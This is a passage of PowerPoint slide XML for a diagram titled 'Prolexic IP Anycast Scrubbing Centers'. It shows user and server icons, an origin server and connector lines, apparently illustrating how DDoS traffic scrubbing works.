              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4" y="2637"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36189"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90"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91"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167" name="Group 527"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4" y="2624"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36186"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87"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8"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81"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2"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3"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4"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85"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36193" name="Group 522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="7997957" y="703069"/>
              <a:ext cx="543806" cy="582930"/>
              <a:chOff x="4" y="2581"/>
              <a:chExt cx="222" cy="219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36205" name="Group 523"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4" y="2637"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36163"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64"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6165"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36206" name="Group 527"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4" y="2624"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36160"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6161"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62"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6155"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6"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7"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8"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6159"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nvGrpSpPr>
            <p:cNvPr id="283" name="Group 522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="11181339" y="6550761"/>
              <a:ext cx="543806" cy="582930"/>
              <a:chOff x="4" y="2581"/>
              <a:chExt cx="222" cy="219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="284" name="Group 523"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4" y="2637"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="35981" name="Line 524"/>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82" name="Oval 525"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="429" y="1152"/>
                  <a:ext cx="51"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sp>
              <p:nvSpPr>
                <p:cNvPr id="35983" name="Oval 526"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="144" y="1248"/>
                  <a:ext cx="47" cy="72"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr rot="10800000" wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                    <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="285" name="Group 527"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4" y="2624"/>
                <a:ext cx="222" cy="169"/>
                <a:chOff x="144" y="1152"/>
                <a:chExt cx="336" cy="168"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="35978" name="Line 528"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm flipH="1">
                  <a:off x="164" y="1185"/>
                  <a:ext cx="307" cy="96"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="44450">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="35979" name="Oval 529"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="429" y="1152"/>
                  <a:ext cx="51"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80" name="Oval 530"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="144" y="1248"/>
                  <a:ext cx="47" cy="72"/>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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35973" name="Oval 531"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm>
                <a:off x="76" y="2654"/>
                <a:ext cx="73"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4" name="Oval 532"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm>
                <a:off x="50" y="2581"/>
                <a:ext cx="127" cy="146"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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5" name="Oval 533"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm>
                <a:off x="76" y="2630"/>
                <a:ext cx="32"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6" name="Oval 534"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm>
                <a:off x="122" y="2630"/>
                <a:ext cx="31" cy="48"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35977" name="Line 535"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm>
                <a:off x="86" y="2727"/>
                <a:ext cx="63" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35920" name="Picture 35" descr="End_User"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10877925" y="1882563"/>
            <a:ext cx="666662" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="322" name="Group 321"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5877650" y="2103120"/>
            <a:ext cx="5635624" cy="4069080"/>
            <a:chOff x="5877650" y="2103120"/>
            <a:chExt cx="5635624" cy="4069080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35937" name="Picture 9" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5980116" y="5382295"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35938" name="Picture 5" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8629286" y="5333192"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35939" name="Picture 11" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8541763" y="2103120"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35940" name="Picture 13" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5877650" y="2229078"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35945" name="Picture 6" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10591081" y="3332810"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35927" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2169514" y="3031872"/>
            <a:ext cx="1864752" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Origin Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="561" name="Picture 10" descr="gray_server"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3023710" y="3352842"/>
            <a:ext cx="1950720" cy="1247774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Title 587"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="727075" y="319090"/>
            <a:ext cx="11535805" cy="805816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="54842" tIns="27420" rIns="54842" bIns="27420" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="548494" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Prolexic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Anycast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Scrubbing Centers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4034266" y="5887419"/>
            <a:ext cx="1939304" cy="777702"/>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525" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4312908" y="2615072"/>
            <a:ext cx="4285170" cy="1412746"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 13056"/>
              <a:gd name="connsiteY0" fmla="*/ 9291 h 9291"/>
              <a:gd name="connsiteX1" fmla="*/ 13056 w 13056"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 9291"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9919"/>
              <a:gd name="connsiteY0" fmla="*/ 7458 h 7458"/>
              <a:gd name="connsiteX1" fmla="*/ 9919 w 9919"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 7458"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 36812"/>
              <a:gd name="connsiteY0" fmla="*/ 48297 h 48297"/>
              <a:gd name="connsiteX1" fmla="*/ 36812 w 36812"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 48297"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 36812"/>
              <a:gd name="connsiteY0" fmla="*/ 48297 h 48297"/>
              <a:gd name="connsiteX1" fmla="*/ 26699 w 36812"/>
              <a:gd name="connsiteY1" fmla="*/ 11574 h 48297"/>
              <a:gd name="connsiteX2" fmla="*/ 36812 w 36812"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 48297"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 36812"/>
              <a:gd name="connsiteY0" fmla="*/ 48297 h 48297"/>
              <a:gd name="connsiteX1" fmla="*/ 36812 w 36812"/>
              <a:gd name="connsiteY1"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6812"/>
              <a:gd name="connsiteY0" fmla="*/ 48297 h 48297"/>
              <a:gd name="connsiteX1" fmla="*/ 26699 w 36812"/>
              <a:gd name="connsiteY1" fmla="*/ 9715 h 48297"/>
              <a:gd name="connsiteX2" fmla="*/ 36812 w 36812"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 48297"/>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148"/>
              <a:gd name="connsiteY0" fmla="*/ 48930 h 48930"/>
              <a:gd name="connsiteX1" fmla="*/ 26699 w 37148"/>
              <a:gd name="connsiteY1" fmla="*/ 10348 h 48930"/>
              <a:gd name="connsiteX2" fmla="*/ 36812 w 37148"/>
              <a:gd name="connsiteY2" fmla="*/ 633 h 48930"/>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237"/>
              <a:gd name="connsiteY0" fmla="*/ 46327 h 46327"/>
              <a:gd name="connsiteX1" fmla="*/ 26788 w 37237"/>
              <a:gd name="connsiteY1" fmla="*/ 10348 h 46327"/>
              <a:gd name="connsiteX2" fmla="*/ 36901 w 37237"/>
              <a:gd name="connsiteY2" fmla="*/ 633 h 46327"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 37148"/>
              <a:gd name="connsiteY0" fmla="*/ 48930 h 48930"/>
              <a:gd name="connsiteX1" fmla="*/ 26788 w 37148"/>
              <a:gd name="connsiteY1" fmla="*/ 12951 h 48930"/>
              <a:gd name="connsiteX2" fmla="*/ 36812 w 37148"/>
              <a:gd name="connsiteY2" fmla="*/ 633 h 48930"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 37148"/>
              <a:gd name="connsiteY0" fmla="*/ 48930 h 48930"/>
              <a:gd name="connsiteX1" fmla="*/ 26699 w 37148"/>
              <a:gd name="connsiteY1" fmla="*/ 9233 h 48930"/>
              <a:gd name="connsiteX2" fmla="*/ 36812 w 37148"/>
              <a:gd name="connsiteY2" fmla="*/ 633 h 48930"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10449"/>
              <a:gd name="connsiteY0" fmla="*/ 9233 h 9233"/>
              <a:gd name="connsiteX1" fmla="*/ 10113 w 10449"/>
              <a:gd name="connsiteY1" fmla="*/ 633 h 9233"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9915"/>
              <a:gd name="connsiteY0" fmla="*/ 11611 h 11611"/>
              <a:gd name="connsiteX1" fmla="*/ 9593 w 9915"/>
              <a:gd name="connsiteY1" fmla="*/ 686 h 11611"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9915" h="11611">
                <a:moveTo>
                  <a:pt x="0" y="11611"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4461" y="6565"/>
                  <a:pt x="9915" y="0"/>
                  <a:pt x="9593" y="686"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="39999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54850" tIns="27424" rIns="54850" bIns="27424" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1306018">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" baseline="-25000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11052177" y="3018983"/>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3" name="TextBox 492"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8208526" y="4740654"/>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4" name="TextBox 493"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7683153" y="3033173"/>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5" name="TextBox 494"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5783286" y="4840416"/>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
        <p:nvSpPr>
          <p:cNvPr id="496" name="TextBox 495"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5503542" y="1768522"/>
            <a:ext cx="1680268" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>128.2.205.42</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1731422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24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="524"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="12" presetID="22"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par>
                                <p:cTn id="15" presetID="22" presetClass="entr" presetSubtype="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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="2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52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59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righ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525"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
